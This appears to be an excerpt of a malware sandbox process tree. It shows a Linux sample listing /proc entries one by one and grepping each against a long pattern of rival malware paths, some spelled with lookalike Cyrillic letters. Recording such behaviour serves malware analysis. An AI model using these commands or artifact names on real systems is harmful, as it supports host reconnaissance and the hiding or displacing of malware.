/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1264
-
-
/bin/grepgrep exe2⤵PID:1267
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1266
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1270
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1273
-
-
/bin/grepgrep exe2⤵PID:1274
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1276
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1279
-
-
/bin/grepgrep exe2⤵PID:1280
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1283
-
-
/bin/grepgrep exe2⤵PID:1286
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1285
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1290
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1292
-
-
/bin/grepgrep exe2⤵PID:1293
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1296
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1299
-
-
/bin/grepgrep exe2⤵PID:1300
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1302
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1305
-
-
/bin/grepgrep exe2⤵PID:1306
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1309
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1311
-
-
/bin/grepgrep exe2⤵PID:1312
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1315
-
-
/bin/grepgrep exe2⤵PID:1319
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1318
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1321
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1324
-
-
/bin/grepgrep exe2⤵PID:1325
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1328
-
-
/bin/grepgrep exe2⤵PID:1331
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1330
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1334
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1337
-
-
/bin/grepgrep exe2⤵PID:1338
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1340
-
-
/bin/grepgrep exe2⤵PID:1344
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1343
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1347
-
-
/bin/grepgrep exe2⤵PID:1351
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1350
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1354
-
-
/bin/lsls -latrh /proc/net2⤵PID:1356
-
-
/bin/grepgrep exe2⤵PID:1357
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1364
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1363
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1366
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1369
-
-
/bin/grepgrep exe2⤵PID:1370
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1373
-
-
/bin/grepgrep exe2⤵PID:1376
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1375
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1379
-
-
/bin/grepgrep exe2⤵PID:1383
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1382
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1385
-
-
/bin/grepgrep exe2⤵PID:1389
-
-
/bin/lsls -latrh /proc/self2⤵PID:1388
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1392
-
-
/bin/grepgrep exe2⤵PID:1395
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1394
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1397
-
-
/bin/grepgrep exe2⤵PID:1400
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1399
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1402
-
-
/bin/grepgrep exe2⤵PID:1405
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1404
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1407
-
-
/bin/grepgrep exe2⤵PID:1410
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1409
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1412
-
-
/bin/grepgrep exe2⤵PID:1415
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1414
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1417
-
-
/bin/grepgrep exe2⤵PID:1420
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1419
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1422
-
-
/bin/grepgrep exe2⤵PID:1425
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1424
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1427
-
-
/bin/grepgrep exe2⤵PID:1430
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1429
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1432
-
-
/bin/grepgrep exe2⤵PID:1435
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1434
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1437
-
-
/bin/grepgrep exe2⤵PID:1440
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1439
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1442
-
-
/bin/grepgrep exe2⤵PID:1445
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1444
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1447
-
-
/bin/grepgrep exe2⤵PID:1450
-
-
/bin/lsls -latrh /proc/version2⤵PID:1449
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1452
-
-
/bin/grepgrep exe2⤵PID:1455
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1454
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1457
-
-
/bin/grepgrep exe2⤵PID:1460
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1459
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1462
-
-
/bin/grepgrep exe2⤵PID:1465
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1464
-
-
